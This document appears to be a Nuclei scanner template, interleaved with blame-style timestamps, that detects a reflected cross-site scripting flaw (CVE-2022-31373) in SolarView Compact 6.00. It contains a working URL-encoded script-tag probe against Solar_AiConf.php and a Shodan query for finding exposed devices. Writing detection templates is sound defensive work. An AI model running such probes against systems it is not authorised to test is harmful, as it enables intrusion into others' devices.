2022-07-06 19:29:39 +00:00
id : CVE-2022-31373
info :
2022-09-29 13:38:41 +00:00
name : SolarView Compact 6.00 - Cross-Site Scripting
2022-07-06 19:29:39 +00:00
author : ritikchaddha
2022-09-29 13:38:41 +00:00
severity : high
2022-07-06 19:29:39 +00:00
description : |
2022-09-29 13:38:41 +00:00
SolarView Compact 6.00 contains a cross-site scripting vulnerability via Solar_AiConf.php. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2022-07-06 19:29:39 +00:00
reference :
- https://github.com/badboycxcc/SolarView_Compact_6.0_xss
- https://nvd.nist.gov/vuln/detail/CVE-2022-31373
2022-09-20 13:15:49 +00:00
classification :
2022-09-22 09:32:41 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-09-20 13:15:49 +00:00
cve-id : CVE-2022-31373
2022-09-22 09:32:41 +00:00
cwe-id : CWE-79
2022-07-06 19:29:39 +00:00
metadata :
shodan-query : http.html:"SolarView Compact"
2022-09-22 09:32:41 +00:00
verified : "true"
2022-07-06 19:29:39 +00:00
tags : cve,cve2022,xss,solarview
requests :
- method : GET
path :
- '{{BaseURL}}/Solar_AiConf.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition : and
matchers :
- type : word
2022-07-09 16:34:25 +00:00
part : body
2022-07-06 19:29:39 +00:00
words :
- '/Solar_AiConf.php/"><script>alert(document.domain)</script>'
2022-09-20 13:06:46 +00:00
- 'HREF="Solar_Service.php"'
condition : and
2022-09-20 13:08:37 +00:00
2022-07-06 19:29:39 +00:00
- type : word
part : header
words :
- "text/html"
- type : status
status :
- 200
2022-09-29 13:38:41 +00:00
# Enhanced by mp on 2022/09/28